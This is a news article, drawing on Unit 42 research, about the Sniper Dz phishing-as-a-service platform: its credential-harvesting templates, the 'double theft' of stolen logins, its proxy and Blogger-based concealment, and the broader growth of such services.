In the past year, the phishing-as-a-service (PhaaS) platform known as Sniper Dz has facilitated over 140,000 cyberattacks. The free platform offers tools to help cybercriminals target user credentials, making phishing campaigns easier to launch even for those with limited skills. Its activities are linked to widespread credential theft across multiple online platforms.
The Growth of Sniper Dz and Its Role in Phishing
Sniper Dz stands out as a PhaaS that works for both novice and experienced cybercriminals. According to research by Unit 42 at Palo Alto Networks, Sniper Dz provides an admin panel where users can access a catalog of phishing pages. These pages can either be hosted on Sniper Dz’s infrastructure or downloaded and hosted on the attackers’ own servers. As a result, the platform’s ease of use and flexibility have made it a popular choice, with over 7,170 subscribers on its dedicated Telegram channel as of October 2024. One of the reasons for Sniper Dz’s success is its ability to offer free services that allow attackers to collect login credentials from victims. Once harvested, the stolen data is sent back to the PhaaS platform, a tactic that Microsoft has termed “double theft.” This means that platform users benefit from the stolen credentials, but so do the operators of Sniper Dz, who are able to access these credentials on a larger scale. The platform’s Telegram channel is active in sharing phishing-related resources and techniques, with videos that detail how to use Sniper Dz templates to create fake login pages for popular sites like Facebook, Instagram, and gaming platforms such as PUBG and Free Fire. These multilingual templates, available in English, Arabic, and French, make Sniper Dz a global threat.
Tactics for Concealment and Avoiding Detection
Sniper Dz employs various techniques to hide its activities. The platform uses legitimate proxy servers (e.g., proxymesh[.]com) to mask the backend servers hosting phishing content. When victims are redirected to a phishing page, their browsers interact only with the proxy server, making it difficult for security researchers to track the origin of the attack. This tactic helps protect the backend servers. For users who wish to self-host their phishing pages, Sniper Dz provides downloadable HTML templates. The platform also offers tools to convert phishing templates into formats compatible with platforms like Google Blogger, which allows attackers to disguise their malicious content as legitimate blog posts. This approach is effective in evading detection since blog hosting platforms are less likely to be scrutinized compared to traditional phishing domains. Unit 42 researchers noted an increase in phishing activity facilitated by Sniper Dz starting in mid-2024, targeting users primarily in the United States. Once user credentials are stolen through these campaigns, they are collected and displayed on Sniper Dz’s centralized admin panel, which the platform operators and their users can access.
The Rising Popularity of PhaaS Platforms
Phishing-as-a-service platforms like Sniper Dz are becoming an increasingly popular option for aspiring cybercriminals. These platforms lower the entry barriers for phishing attacks by offering ready-made templates, automated tools, and online support. This trend is seen across Telegram channels, where PhaaS providers promote their services and provide tutorials to ensure that even inexperienced users can run phishing campaigns. Sniper Dz is only one of several cyber threats that have gained momentum this year, with other groups like Storm-0501 having targeted infrastructure through their ransomware attacks on hybrid cloud environments. Sniper Dz is an example of how phishing has evolved to become more accessible and scalable, making it easy for even low-skilled actors to launch attacks against unsuspecting victims. With ready-to-use kits available on-demand, cybercriminals no longer need advanced coding skills to successfully steal user credentials or engage in fraudulent activities.
How Cybercriminals Use Sniper Dz to Target Victims
The phishing templates provided by Sniper Dz often mimic well-known brands and platforms to trick victims into entering their credentials. These templates cover a variety of online services, including social media (e.g., Facebook, Instagram), messaging apps (e.g., Skype, Snapchat), streaming services (e.g., Netflix), and gaming platforms. Once a victim enters their information into a fake login page, the details are instantly captured and transmitted to the attackers. The platform’s phishing pages are hosted behind a legitimate proxy server, making them difficult to detect. Additionally, Sniper Dz uses a centralized system to collect and track stolen credentials. This enables a coordinated approach to data theft and allows operators to manage stolen data in an organized way. The rise of platforms like Sniper Dz illustrates how PhaaS is changing cybercrime. By providing resources and a support structure for phishing attacks, PhaaS platforms allow a wider range of threat actors to conduct credential theft and other malicious activities. These platforms are further supported by underground forums and social media channels, where attackers can learn and exchange best practices. The tactics used by Sniper Dz, such as using legitimate proxy servers and downloadable phishing templates, have made phishing attacks harder to trace. This evolution is a challenge for cybersecurity professionals, as they must now contend with methods of phishing and a growing number of attackers using PhaaS platforms.
Sniper Dz is an example of how phishing-as-a-service platforms are allowing cybercriminals to conduct large-scale phishing attacks without requiring technical expertise.
Image credit: Bits and Splits, AdobeStock